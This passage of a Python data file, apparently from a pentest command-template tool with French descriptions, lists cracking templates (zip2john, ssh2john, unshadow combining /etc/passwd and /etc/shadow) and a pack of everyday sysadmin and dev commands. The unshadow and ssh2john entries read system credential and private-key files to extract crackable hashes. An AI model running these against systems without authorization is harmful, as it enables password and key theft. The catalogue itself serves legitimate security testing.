                "tags": ["exiftool"],
            },
            {
                "id": "zip2john-hash", "title": "Zip2john", "category": "Cassage",
                "description": "Extrait le hash d'une archive ZIP protégée pour John the Ripper.",
                "template": "zip2john {{FILE:archive.zip}} > {{OUTPUT:hash.txt}}",
                "tags": ["john", "zip"],
            },
            {
                "id": "ssh2john-hash", "title": "SSH2john", "category": "Cassage",
                "description": "Extrait le hash d'une clé privée SSH protégée par passphrase.",
                "template": "ssh2john {{FILE:id_rsa}} > {{OUTPUT:hash.txt}}",
                "tags": ["john", "ssh"],
            },
            {
                "id": "unshadow-combine", "title": "Unshadow", "category": "Cassage",
                "description": "Combine passwd et shadow en un format exploitable par John.",
                "template": "unshadow /etc/passwd {{SHADOW_FILE:/etc/shadow}} > {{OUTPUT:combined.txt}}",
                "tags": ["john", "unshadow"],
            },
            {
                "id": "base64-decode-cli", "title": "Décoder du Base64", "category": "Utils",
                "description": "Décode rapidement une chaîne Base64 en ligne de commande.",
                "template": 'echo "{{DATA}}" | base64 -d',
                "tags": ["base64"],
            },
        ],
    },
    {
        "pack_id": "sysadmin-dev",
        "pack_name": "SysAdmin & Dev Utils",
        "author": AUTHOR,
        "version": VERSION,
        "color": "#94a3b8",
        "icon": "wrench",
        "pack_tags": ["SysAdmin", "Dev"],
        "description": "Commandes utilitaires du quotidien pour l'administration système et le développement.",
        "scripts": [
            {
                "id": "python-http-server", "title": "Serveur HTTP Python", "category": "Utils",
                "description": "Sert le répertoire courant en HTTP pour transférer des fichiers.",
                "template": "python3 -m http.server {{PORT:8000}}",
                "tags": ["python", "http"],
            },
            {
                "id": "tar-compress", "title": "Archive tar.gz", "category": "Utils",
                "description": "Compresse un dossier en archive tar.gz.",
                "template": "tar -czvf {{OUTPUT:archive.tar.gz}} {{TARGET_PATH:./dossier}}",
                "tags": ["tar"],
            },
            {
                "id": "rsync-copy", "title": "Rsync — Copie distante", "category": "Utils",
                "description": "Synchronise un dossier local vers un hôte distant via SSH.",
                "template": "rsync -avz {{SOURCE:./local/}} {{USERNAME}}@{{TARGET_IP}}:{{DEST:/remote/path}}",
                "tags": ["rsync"],
            },
            {
                "id": "systemctl-status", "title": "Statut d'un service", "category": "Utils",
                "description": "Affiche l'état détaillé d'un service systemd.",
                "template": "systemctl status {{SERVICE:nginx}}",
                "tags": ["systemctl"],
            },
            {
                "id": "git-clone-repo", "title": "Git — Cloner un dépôt", "category": "Dev",
                "description": "Clone un dépôt Git dans le dossier courant.",
                "template": "git clone {{REPO_URL}}",
                "tags": ["git"],
            },
            {
                "id": "ssh-keygen-ed25519", "title": "Générer une clé SSH", "category": "Dev",
                "description": "Génère une paire de clés SSH moderne (ed25519).",
                "template": 'ssh-keygen -t ed25519 -C "{{COMMENT:mail@example.com}}" -f {{OUTPUT:id_ed25519}}',
                "tags": ["ssh", "keygen"],
            },
            {
                "id": "curl-api-test", "title": "Tester un endpoint API", "category": "Dev",
                "description": "Envoie une requête HTTP avec en-tête JSON vers une API.",
                "template": 'curl -X {{METHOD:GET}} {{URL:http://api.local/endpoint}} -H "Content-Type: application/json"',
                "tags": ["curl", "api"],
            },
            {
                "id": "find-large-files", "title": "Trouver les gros fichiers", "category": "Utils",
                "description": "Recherche les fichiers dépassant une taille donnée.",
                "template": "find {{PATH:/}} -type f -size +{{SIZE:100M}} 2>/dev/null",
                "tags": ["find", "disk"],
            },
        ],
    },
]
